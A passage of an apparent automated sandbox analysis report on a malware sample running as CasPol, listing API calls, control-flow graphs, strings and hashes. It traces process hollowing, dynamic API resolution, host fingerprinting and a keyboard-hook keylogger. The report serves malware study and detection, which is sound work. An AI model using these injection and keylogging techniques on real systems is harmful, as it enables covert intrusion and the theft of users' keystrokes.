41aec8 28 API calls 53341->53342 53343 414c7b 53342->53343 53344 401d64 28 API calls 53343->53344 53345 414c89 53344->53345 53346 4027ec 28 API calls 53345->53346 53347 414c97 53346->53347 53391 40275c 28 API calls 53347->53391 53349 414ca6 53350 4027cb 28 API calls 53349->53350 53351 414cb5 53350->53351 53392 40275c 28 API calls 53351->53392 53353 414cc4 53354 4027cb 28 API calls 53353->53354 53355 414cd0 53354->53355 53393 40275c 28 API calls 53355->53393 53357 414cda 53358 404468 60 API calls 53357->53358 53359 414ce9 53358->53359 53360 401eea 26 API calls 53359->53360 53361 414cf2 53360->53361 53362 401eea 26 API calls 53361->53362 53363 414cfe 53362->53363 53364 401eea 26 API calls 53363->53364 53365 414d0a 53364->53365 53366 401eea 26 API calls 53365->53366 53367 414d16 53366->53367 53368 401eea 26 API calls 53367->53368 53369 414d22 53368->53369 53370 401eea 26 API calls 53369->53370 53371 414d2e 53370->53371 53372 401e13 26 API calls 53371->53372 53373 414d3a 53372->53373 53374 401eea 26 API calls 53373->53374 53375 414d43 53374->53375 53376 401eea 26 API calls 53375->53376 53377 414d4c 53376->53377 53378 401d64 28 API calls 53377->53378 53379 414d57 53378->53379 53380 43a5e7 42 API calls 53379->53380 53381 414d64 53380->53381 53382 414d69 53381->53382 53383 414d8f 53381->53383 53386 414d82 53382->53386 53387 414d77 53382->53387 53384 401d64 28 API calls 53383->53384 53384->53385 53385->53323 53385->53328 53389 404915 104 API calls 53386->53389 53394 4049ba 81 API calls 53387->53394 53389->53323 53390->53336 53391->53349 53392->53353 53393->53357 53394->53334 53395->53334 53396->52936 53397->52941 53398->52943 53401 40cc3f 53400->53401 53402 403b9e 28 API calls 53401->53402 53403 40ca3a 53402->53403 53404 402860 53403->53404 53408 40286f 53404->53408 53405 4028b1 53413 402daf 53405->53413 53407 4028af 53407->52369 53408->53405 53409 4028a6 53408->53409 53412 402d68 28 API calls 53409->53412 53411->52349 53412->53407 53414 402dbb 53413->53414 53415 4030f7 28 API calls 53414->53415 53416 402dcd 53415->53416 53416->53407 53419 40e56a 53417->53419 53418 4124b7 3 API calls 53418->53419 53419->53418 53420 40e60e 53419->53420 53422 40e5fe Sleep 53419->53422 53439 40e59c 53419->53439 53423 4082dc 28 API calls 53420->53423 53421 4082dc 28 API calls 53421->53439 53422->53419 53426 40e619 53423->53426 53425 41ae08 28 API calls 53425->53439 53427 41ae08 28 API calls 53426->53427 53428 40e625 53427->53428 53452 412774 29 API calls 53428->53452 53431 401e13 26 API calls 53431->53439 53432 40e638 53433 401e13 26 API calls 53432->53433 53435 40e644 53433->53435 53434 401f66 28 API calls 53434->53439 53436 401f66 28 API calls 53435->53436 53437 40e655 53436->53437 53440 4126d2 29 API calls 53437->53440 53438 4126d2 29 API calls 53438->53439 53439->53421 53439->53422 53439->53425 53439->53431 53439->53434 53439->53438 53450 40bf04 73 API calls ___scrt_fastfail 53439->53450 53451 412774 29 API calls 53439->53451 53441 40e668 53440->53441 53453 411699 TerminateProcess WaitForSingleObject 53441->53453 53443 40e670 ExitProcess 53454 411637 61 API calls 53445->53454 53451->53439 53452->53432 53453->53443 53455 41569e 53456 401d64 28 API calls 53455->53456 53457 4156b3 53456->53457 53458 401fbd 28 API calls 53457->53458 53459 4156bb 53458->53459 53460 401d64 28 API calls 53459->53460 53461 4156cb 53460->53461 53462 401fbd 28 API calls 53461->53462 53463 4156d3 53462->53463 53466 411aed 53463->53466 53467 4041f1 3 API calls 53466->53467 53468 411b01 53467->53468 53469 40428c 96 API calls 53468->53469 53470 411b09 53469->53470 53471 4027ec 28 API calls 53470->53471 53472 411b22 53471->53472 53473 4027cb 28 API calls 53472->53473 53474 411b2c 53473->53474 53475 404468 60 API calls 53474->53475 53476 411b36 53475->53476 53477 401eea 26 API calls 53476->53477 53478 411b3e 53477->53478 53479 4045d5 260 API calls 53478->53479 53480 411b4c 53479->53480 53481 401eea 26 API calls 53480->53481 53482 411b54 53481->53482 53483 401eea 26 API calls 53482->53483 53484 411b5c 53483->53484

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                              • API String ID: 384173800-625181639
                                                                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 451 4175cf-4175d9 449->451 450->449 452 4172ec-4172f3 450->452 452->449 453 4172f9-4172fb 452->453 453->449 454 417301-41732d call 436050 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ad0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 481 417522-417528 478->481 482 41753e-417542 478->482 480 4174e6-417509 call 435ad0 479->480 492 41750b-417512 480->492 481->482 484 41752a-41753b call 417651 481->484 485 417544-417560 WriteProcessMemory 482->485 486 417566-41757d Wow64SetThreadContext 482->486 484->482 485->463 487 417562 485->487 486->463 488 41757f-41758b ResumeThread 486->488 487->486 488->463 491 41758d-41758f 488->491 491->451 492->478
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                              • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                                              • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                              • API String ID: 3150337530-3035715614
                                                                                                                                                              • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                                              • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1638 4099e4-4099fd 1639 409a63-409a73 GetMessageA 1638->1639 1640 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1638->1640 1641 409a75-409a8d TranslateMessage DispatchMessageA 1639->1641 1642 409a8f 1639->1642 1640->1639 1643 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1640->1643 1641->1639 1641->1642 1644 409a91-409a96 1642->1644 1643->1644
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                              Strings
                                                                                                                                                              • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                              • String ID: Keylogger initialization failure: error
                                                                                                                                                              • API String ID: 3219506041-952744263
                                                                                                                                                              • Opcode ID: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                                                                                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                                                              • Opcode Fuzzy Hash: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                                                                                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1655 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1662 10001177-1000119e lstrlenW FindFirstFileW 1655->1662 1663 10001168-10001172 lstrlenW 1655->1663 1664 100011a0-100011a8 1662->1664 1665 100011e1-100011e9 1662->1665 1663->1662 1666 100011c7-100011d8 FindNextFileW 1664->1666 1667 100011aa-100011c4 call 10001000 1664->1667 1666->1664 1669 100011da-100011db FindClose 1666->1669 1667->1666 1669->1665
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1083526818-0
                                                                                                                                                              • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                              • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                              • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                              • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                              • String ID: 5.3.0 Pro$PFb$override$pth_unenc
                                                                                                                                                              • API String ID: 2281282204-2102802621
                                                                                                                                                              • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                                                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                                              • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                                                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3525466593-0
                                                                                                                                                              • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                                              • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                              Strings
                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                              • API String ID: 2532271599-1507639952
                                                                                                                                                              • Opcode ID: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                                                                                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                                              • Opcode Fuzzy Hash: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                                                                                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                                              APIs
                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                                              APIs
                                                                                                                                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
